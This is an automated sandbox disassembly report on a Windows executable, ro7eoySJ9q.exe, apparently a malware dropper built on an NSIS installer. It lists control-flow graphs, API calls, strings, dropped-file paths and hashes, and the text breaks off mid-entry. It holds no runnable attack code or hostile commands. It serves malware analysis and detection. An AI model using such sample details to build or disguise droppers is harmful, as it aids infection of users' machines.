                                                                      control_flow_graph 168 40371a-403732 call 4060b0 171 403734-403744 call 405c8d 168->171 172 403746-40377d call 405c13 168->172 179 4037a0-4037c9 call 4039f0 call 4058b6 171->179 177 403795-40379b lstrcatW 172->177 178 40377f-403790 call 405c13 172->178 177->179 178->177 186 40385b-403863 call 4058b6 179->186 187 4037cf-4037d4 179->187 193 403871-403896 LoadImageW 186->193 194 403865-40386c call 405d68 186->194 187->186 188 4037da-403802 call 405c13 187->188 188->186 195 403804-403808 188->195 197 403917-40391f call 40140b 193->197 198 403898-4038c8 RegisterClassW 193->198 194->193 200 40381a-403826 lstrlenW 195->200 201 40380a-403817 call 4057db 195->201 210 403921-403924 197->210 211 403929-403934 call 4039f0 197->211 202 4039e6 198->202 203 4038ce-403912 SystemParametersInfoW CreateWindowExW 198->203 207 403828-403836 lstrcmpiW 200->207 208 40384e-403856 call 4057ae call 405d46 200->208 201->200 205 4039e8-4039ef 202->205 203->197 207->208 209 403838-403842 GetFileAttributesW 207->209 208->186 214 403844-403846 209->214 215 403848-403849 call 4057fa 209->215 210->205 221 40393a-403957 ShowWindow LoadLibraryW 211->221 222 4039bd-4039be call 4050cd 211->222 214->208 214->215 215->208 224 403960-403972 GetClassInfoW 221->224 225 403959-40395e LoadLibraryW 221->225 226 4039c3-4039c5 222->226 227 403974-403984 GetClassInfoW RegisterClassW 224->227 228 40398a-4039ad DialogBoxParamW call 40140b 224->228 225->224 229 4039c7-4039cd 226->229 230 4039df-4039e1 call 40140b 226->230 227->228 234 4039b2-4039bb call 40366a 228->234 229->210 232 4039d3-4039da call 40140b 229->232 230->202 232->210 234->205
                                                                      APIs
                                                                        • Part of subcall function 004060B0: GetModuleHandleA.KERNEL32(?,?,00000020,00403220,00000008), ref: 004060C2
                                                                        • Part of subcall function 004060B0: LoadLibraryA.KERNELBASE(?,?,00000020,00403220,00000008), ref: 004060CD
                                                                        • Part of subcall function 004060B0: GetProcAddress.KERNEL32(00000000,?), ref: 004060DE
                                                                      • lstrcatW.KERNEL32(1033,0042D1F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D1F8,00000000,00000006,C:\Users\user\AppData\Local\Temp\,76233420,00000000,"C:\Users\user\Desktop\ro7eoySJ9q.exe"), ref: 0040379B
                                                                      • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken,1033,0042D1F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D1F8,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 0040381B
                                                                      • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken,1033,0042D1F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D1F8,00000000), ref: 0040382E
                                                                      • GetFileAttributesW.KERNEL32(: Completed), ref: 00403839
                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken), ref: 00403882
                                                                        • Part of subcall function 00405C8D: wsprintfW.USER32 ref: 00405C9A
                                                                      • RegisterClassW.USER32(00433E40), ref: 004038BF
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004038D7
                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040390C
                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403942
                                                                      • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403953
                                                                      • LoadLibraryW.KERNEL32(RichEd32), ref: 0040395E
                                                                      • GetClassInfoW.USER32(00000000,RichEdit20A,00433E40), ref: 0040396E
                                                                      • GetClassInfoW.USER32(00000000,RichEdit,00433E40), ref: 0040397B
                                                                      • RegisterClassW.USER32(00433E40), ref: 00403984
                                                                      • DialogBoxParamW.USER32(?,00000000,00403ABD,00000000), ref: 004039A3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                      • String ID: "C:\Users\user\Desktop\ro7eoySJ9q.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$@>C$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Polysulfonate\sangersken$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                      • API String ID: 914957316-1308633169
                                                                      • Opcode ID: 0aa4beac196019a4959303d62d6cbf1607d52bd303ace0c241830d38af164bbc
                                                                      • Instruction ID: f2efbd8b4e2183f22d1c30e2af872408ecd3ec1be094dd46b245239935a3b56e
                                                                      • Opcode Fuzzy Hash: 0aa4beac196019a4959303d62d6cbf1607d52bd303ace0c241830d38af164bbc
                                                                      • Instruction Fuzzy Hash: 9B61D771100700AED320BF669D46F2B3AACEB85B46F10403FF941B62E2DBB95941CB2D

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 239 403abd-403acf 240 403c10-403c1f 239->240 241 403ad5-403adb 239->241 243 403c21-403c69 GetDlgItem * 2 call 403f95 SetClassLongW call 40140b 240->243 244 403c6e-403c83 240->244 241->240 242 403ae1-403aea 241->242 245 403aec-403af9 SetWindowPos 242->245 246 403aff-403b02 242->246 243->244 248 403cc3-403cc8 call 403fe1 244->248 249 403c85-403c88 244->249 245->246 251 403b04-403b16 ShowWindow 246->251 252 403b1c-403b22 246->252 258 403ccd-403ce8 248->258 254 403c8a-403c95 call 401389 249->254 255 403cbb-403cbd 249->255 251->252 259 403b24-403b39 DestroyWindow 252->259 260 403b3e-403b41 252->260 254->255 270 403c97-403cb6 SendMessageW 254->270 255->248 257 403f62 255->257 265 403f64-403f6b 257->265 263 403cf1-403cf7 258->263 264 403cea-403cec call 40140b 258->264 266 403f3f-403f45 259->266 268 403b43-403b4f SetWindowLongW 260->268 269 403b54-403b5a 260->269 273 403f20-403f39 DestroyWindow EndDialog 263->273 274 403cfd-403d08 263->274 264->263 266->257 271 403f47-403f4d 266->271 268->265 275 403b60-403b71 GetDlgItem 269->275 276 403bfd-403c0b call 403ffc 269->276 270->265 271->257 280 403f4f-403f58 ShowWindow 271->280 273->266 274->273 281 403d0e-403d5b call 405d68 call 403f95 * 3 GetDlgItem 274->281 277 403b90-403b93 275->277 278 403b73-403b8a SendMessageW IsWindowEnabled 275->278 276->265 282 403b95-403b96 277->282 283 403b98-403b9b 277->283 278->257 278->277 280->257 309 403d65-403da1 ShowWindow KiUserCallbackDispatcher call 403fb7 EnableWindow 281->309 310 403d5d-403d62 281->310 286 403bc6-403bcb call 403f6e 282->286 287 403ba9-403bae 283->287 288 403b9d-403ba3 283->288 286->276 290 403be4-403bf7 SendMessageW 287->290 292 403bb0-403bb6 287->292 288->290 291 403ba5-403ba7 288->291 290->276 291->286 295 403bb8-403bbe call 40140b 292->295 296 403bcd-403bd6 call 40140b 292->296 307 403bc4 295->307 296->276 305 403bd8-403be2 296->305 305->307 307->286 313 403da3-403da4 309->313 314 403da6 309->314 310->309 315 403da8-403dd6 GetSystemMenu EnableMenuItem SendMessageW 313->315 314->315 316 403dd8-403de9 SendMessageW 315->316 317 403deb 315->317 318 403df1-403e2f call 403fca call 405d46 lstrlenW call 405d68 SetWindowTextW call 401389 316->318 317->318 318->258 327 403e35-403e37 318->327 327->258 328 403e3d-403e41 327->328 329 403e60-403e74 DestroyWindow 328->329 330 403e43-403e49 328->330 329->266 332 403e7a-403ea7 CreateDialogParamW 329->332 330->257 331 403e4f-403e55 330->331 331->258 333 403e5b 331->333 332->266 334 403ead-403f04 call 403f95 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 332->334 333->257 334->257 339 403f06-403f19 ShowWindow call 403fe1 334->339 341 403f1e 339->341 341->266
                                                                      APIs
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403AF9
                                                                      • ShowWindow.USER32(?), ref: 00403B16
                                                                      • DestroyWindow.USER32 ref: 00403B2A
                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403B46
                                                                      • GetDlgItem.USER32(?,?), ref: 00403B67
                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403B7B
                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403B82
                                                                      • GetDlgItem.USER32(?,00000001), ref: 00403C30
                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403C3A
                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00403C54
                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403CA5
                                                                      • GetDlgItem.USER32(?,00000003), ref: 00403D4B
                                                                      • ShowWindow.USER32(00000000,?), ref: 00403D6C
                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403D7E
                                                                      • EnableWindow.USER32(?,?), ref: 00403D99
                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403DAF
                                                                      • EnableMenuItem.USER32(00000000), ref: 00403DB6
                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403DCE
                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403DE1
                                                                      • lstrlenW.KERNEL32(0042D1F8,?,0042D1F8,00433EA0), ref: 00403E0A
                                                                      • SetWindowTextW.USER32(?,0042D1F8), ref: 00403E1E
                                                                      • ShowWindow.USER32(?,0000000A), ref: 00403F52
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                      • String ID:
                                                                      • API String ID: 3282139019-0
                                                                      • Opcode ID: 8e1e93e696dc9d9bf908262f32253b95ed2efac643936c27f45201f4937cad5a
                                                                      • Instruction ID: 9063085a3fd87244c99a969d1f6d2bb761e88773988a4a67d8464f71257f90be
                                                                      • Opcode Fuzzy Hash: 8e1e93e696dc9d9bf908262f32253b95ed2efac643936c27f45201f4937cad5a
                                                                      • Instruction Fuzzy Hash: 7BC1CD71900305BFDB216F65EE8AE2A3E7CFB4970AB14043EF641B11E1CB7999429B1D

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 342 402cff-402d4d GetTickCount GetModuleFileNameW call 4059cf 345 402d59-402d87 call 405d46 call 4057fa call 405d46 GetFileSize 342->345 346 402d4f-402d54 342->346 354 402e74-402e82 call 402c9b 345->354 355 402d8d 345->355 347 402f31-402f35 346->347 361 402e84-402e87 354->361 362 402ed7-402edc 354->362 357 402d92-402da9 355->357 359 402dab 357->359 360 402dad-402daf call 403160 357->360 359->360 366 402db4-402db6 360->366 364 402e89-402e9a call 403192 call 403160 361->364 365 402eab-402ed5 GlobalAlloc call 403192 call 402f38 361->365 362->347 384 402e9f-402ea1 364->384 365->362 390 402ee8-402ef9 365->390 368 402dbc-402dc3 366->368 369 402ede-402ee6 call 402c9b 366->369 374 402dc5-402dd9 call 40598a 368->374 375 402e3f-402e43 368->375 369->362 380 402e4d-402e53 374->380 389 402ddb-402de2 374->389 379 402e45-402e4c call 402c9b 375->379 375->380 379->380 386 402e62-402e6c 380->386 387 402e55-402e5f call 40615e 380->387 384->362 392 402ea3-402ea9 384->392 386->357 391 402e72 386->391 387->386 389->380 395 402de4-402deb 389->395 396 402f01-402f06 390->396 397 402efb 390->397 391->354 392->362 392->365 395->380 398 402ded-402df4 395->398 399 402f07-402f0d 396->399 397->396 398->380 400 402df6-402dfd 398->400 399->399 401 402f0f-402f2a SetFilePointer call 40598a 399->401 400->380 402 402dff-402e1f 400->402 405 402f2f 401->405 402->362 404 402e25-402e29 402->404 406 402e31-402e39 404->406 407 402e2b-402e2f 404->407 405->347 406->380 408 402e3b-402e3d 406->408 407->391 407->406 408->380
                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00402D10
                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\ro7eoySJ9q.exe,00000400,?,?,?,00000000,004033FE,?), ref: 00402D2C
                                                                        • Part of subcall function 004059CF: GetFileAttributesW.KERNELBASE(00000003,00402D3F,C:\Users\user\Desktop\ro7eoySJ9q.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 004059D3
                                                                        • Part of subcall function 004059CF: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004033FE,?), ref: 004059F5
                                                                      • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ro7eoySJ9q.exe,C:\Users\user\Desktop\ro7eoySJ9q.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 00402D78
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                      • String ID: "C:\Users\user\Desktop\ro7eoySJ9q.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\ro7eoySJ9q.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                      • API String ID: 4283519449-1820463279
                                                                      • Opcode ID: 8f28a7fd6c0e7d3444f95869c0558a3ff55555bbefce27c9d00e146f9aea9c7c
                                                                      • Instruction ID: 77e1e34d23ec3cd6b8d0d5fd72658ee77a79da899d912ccb87991cca2eeb2408
                                                                      • Opcode Fuzzy Hash: 8f28a7fd6c0e7d3444f95869c0558a3ff55555bbefce27c9d00e146f9aea9c7c
                                                                      • Instruction Fuzzy Hash: 0051D471944218AFDB109F65DE89B9F7AB8FB14358F10403BFA04B62D0C7B89D418B9D

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 540 401752-401777 call 402ad0 call 405825 545 401781-401793 call 405d46 call 4057ae lstrcatW 540->545 546 401779-40177f call 405d46 540->546 551 401798-401799 call 405fda 545->551 546->551 555 40179e-4017a2 551->555 556 4017a4-4017ae call 406089 555->556 557 4017d5-4017d8 555->557 565 4017c0-4017d2 556->565 566 4017b0-4017be CompareFileTime 556->566 558 4017e0-4017fc call 4059cf 557->558 559 4017da-4017db call 4059aa 557->559 567 401870-401899 call 404ffa call 402f38 558->567 568 4017fe-401801 558->568 559->558 565->557 566->565 582 4018a1-4018ad SetFileTime 567->582 583 40189b-40189f 567->583 569 401852-40185c call 404ffa 568->569 570 401803-401841 call 405d46 * 2 call 405d68 call 405d46 call 405529 568->570 580 401865-40186b 569->580 570->555 602 401847-401848 570->602 585 402966 580->585 584 4018b3-4018be CloseHandle 582->584 583->582 583->584 587 4018c4-4018c7 584->587 588 40295d-402960 584->588 590 402968-40296c 585->590 591 4018c9-4018da call 405d68 lstrcatW 587->591 592 4018dc-4018df call 405d68 587->592 588->585 598 4018e4-402241 call 405529 591->598 592->598 598->588 598->590 602->580 604 40184a-40184b 602->604 604->569
                                                                      APIs
                                                                      • lstrcatW.KERNEL32(00000000,00000000,Generic,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken,?,?,00000031), ref: 00401793
                                                                      • CompareFileTime.KERNEL32(-00000014,?,Generic,Generic,00000000,00000000,Generic,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken,?,?,00000031), ref: 004017B8
                                                                        • Part of subcall function 00405D46: lstrcpynW.KERNEL32(?,?,00000400,0040324B,00433EA0,NSIS Error), ref: 00405D53
                                                                        • Part of subcall function 00404FFA: lstrlenW.KERNEL32(Frisurens,00000000,0041C0DD,762323A0,?,?,?,?,?,?,?,?,?,0040309B,00000000,?), ref: 00405032
                                                                        • Part of subcall function 00404FFA: lstrlenW.KERNEL32(0040309B,Frisurens,00000000,0041C0DD,762323A0,?,?,?,?,?,?,?,?,?,0040309B,00000000), ref: 00405042
                                                                        • Part of subcall function 00404FFA: lstrcatW.KERNEL32(Frisurens,0040309B,0040309B,Frisurens,00000000,0041C0DD,762323A0), ref: 00405055
                                                                        • Part of subcall function 00404FFA: SetWindowTextW.USER32(Frisurens,Frisurens), ref: 00405067
                                                                        • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040508D
                                                                        • Part of subcall function 00404FFA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050A7
                                                                        • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001013,?,00000000), ref: 004050B5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                      • String ID: C:\Program Files (x86)\edelweissen\romanblade.ini$C:\Users\user\AppData\Roaming\Polysulfonate\sangersken$Generic$Heteric
                                                                      • API String ID: 1941528284-1632189751
                                                                      • Opcode ID: c41d853cd82c4e4dfdb8920349454b92991ee92d33bc5413693936f55365b64f
                                                                      • Instruction ID: d3e4dca81327e3df0df284c572be3abc4bccaf2f3cb66fe1cef89d7a827d5624
                                                                      • Opcode Fuzzy Hash: c41d853cd82c4e4dfdb8920349454b92991ee92d33bc5413693936f55365b64f
                                                                      • Instruction Fuzzy Hash: 9B419171900505BBCF10BBB5DC8ADAF3665EF06369B20823BF012B11E1D63C8A519A6D

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 606 402f38-402f51 607 402f53 606->607 608 402f5a-402f62 606->608 607->608 609 402f64 608->609 610 402f6b-402f70 608->610 609->610 611 402f80-402f8d call 403160 610->611 612 402f72-402f7b call 403192 610->612 616 402f93-402f97 611->616 617 40310d 611->617 612->611 618 4030f6-4030f8 616->618 619 402f9d-402fe4 GetTickCount 616->619 620 40310f-403110 617->620 621 4030fa-4030fd 618->621 622 40314c-40314f 618->622 623 403156 619->623 624 402fea-402ff2 619->624 625 403159-40315d 620->625 628 403102-40310b call 403160 621->628 629 4030ff 621->629 626 403151 622->626 627 403112-403118 622->627 623->625 630 402ff4 624->630 631 402ff7-403005 call 403160 624->631 626->623 634 40311a 627->634 635 40311d-40312b call 403160 627->635 628->617 641 403153 628->641 629->628 630->631 631->617 639 40300b-403014 631->639 634->635 635->617 643 40312d-40313f WriteFile 635->643 642 40301a-40303a call 4061cc 639->642 641->623 649 403040-403053 GetTickCount 642->649 650 4030ee-4030f0 642->650 645 403141-403144 643->645 646 4030f2-4030f4 643->646 645->646 648 403146-403149 645->648 646->620 648->622 651 403055-40305d 649->651 652 40309e-4030a2 649->652 650->620 653 403065-403096 MulDiv wsprintfW call 404ffa 651->653 654 40305f-403063 651->654 655 4030e3-4030e6 652->655 656 4030a4-4030a7 652->656 662 40309b 653->662 654->652 654->653 655->624 657 4030ec 655->657 659 4030c9-4030d4 656->659 660 4030a9-4030bd WriteFile 656->660 657->623 661 4030d7-4030db 659->661 660->646 663 4030bf-4030c2 660->663 661->642 664 4030e1 661->664 662->652 663->646 665 4030c4-4030c7 663->665 664->623 665->661
                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00402FA3
                                                                      • GetTickCount.KERNEL32 ref: 00403048
                                                                      • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403071
                                                                      • wsprintfW.USER32 ref: 00403084
                                                                      • WriteFile.KERNELBASE(00000000,00000000,0041C0DD,00402ED2,00000000), ref: 004030B5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2247987374.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2247963237.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248037574.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248060069.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2248248748.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_ro7eoySJ9q.jbxd
                                                                      Similarity
                                                                      • API ID: CountTick$FileWritewsprintf
                                                                      • String ID: ... %d%%$znA
                                                                      • API String ID: 4209647438-2447772013
                                                                      • Opcode ID: 61ddf02fd636ed85020eb85095074430f0604a488243a9e3d908ba4f2f9dd09b
                                                                      • Instruction ID: 34a6cf203725df572fb249859d8c599c0d8718bcf9279d6af528d8a937ec08d1
                                                                      • Opcode Fuzzy Hash: 61ddf02fd636ed85020eb85095074430f0604a488243a9e3d908ba4f2f9dd09b
